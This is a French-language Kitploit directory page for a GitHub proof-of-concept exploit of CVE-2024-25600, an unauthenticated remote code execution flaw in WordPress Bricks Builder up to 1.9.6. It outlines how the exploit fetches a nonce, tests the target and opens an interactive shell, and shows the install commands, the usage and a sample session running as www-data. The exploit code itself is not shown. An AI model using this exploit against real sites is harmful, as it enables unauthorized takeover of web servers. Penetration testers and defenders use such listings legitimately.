Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-25600-WordPress-Bricks-Builder-RCE-PoC — Vulnérabilité d'exécution de code à distance non authentifiée dans WordPress Bricks Builder <= 1.9.6. Le point de terminaison de rendu des modèles accepte du code PHP sans authentification, permettant l'exécution arbitraire de commandes en tant qu'utilisateur du serveur web. | Kitploit
Outils/GitHubGitHub/estebanzarate/cve-2024-25600-wordpress-bricks-builder-rce-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubestebanzarate/cve-2024-25600-wordpress-bricks-builder-rce-poc

CVE-2024-25600-WordPress-Bricks-Builder-RCE-PoC

Vulnérabilité d'exécution de code à distance non authentifiée dans WordPress Bricks Builder <= 1.9.6. Le point de terminaison de rendu des modèles accepte du code PHP sans authentification, permettant l'exécution arbitraire de commandes en tant qu'utilisateur du serveur web.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 6 moisPas encore vérifié

CVE-2024-25600 — WordPress Bricks Builder RCE (PoC)

Vulnérabilité d'exécution de code à distance non authentifiée dans WordPress Bricks Builder <= 1.9.6. Le point de terminaison de rendu de modèles accepte du code PHP sans authentification, permettant l'exécution arbitraire de commandes en tant qu'utilisateur du serveur web.


Comment ça marche

  1. Récupère le nonce Bricks depuis le code source de la page cible (requis pour interagir avec l'endpoint).
  2. Envoie une charge utile de test pour confirmer que la cible est vulnérable.
  3. Ouvre un shell interactif en injectant des commandes via l'endpoint de rendu.

Prérequis

  • Python 3
  • Installer les dépendances :
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit

Utilisation

root@kitploit:~
python3 exploit.py -u http://TARGET

Exemple :

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10
[*] Fetching nonce from http://10.10.10.10 ...
[*] Checking if the target is vulnerable...
[+] Target is vulnerable!
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Références

  • CVE-2024-25600
  • Bricks Builder Security Advisory
  • Analyse de Wordfence

Crédits

  • Découverte : Snicco / Calvin Alkan
  • Exploit original : K3ysTr0K3R
  • Nettoyage et simplification : Esteban Zárate
Télécharger l’outil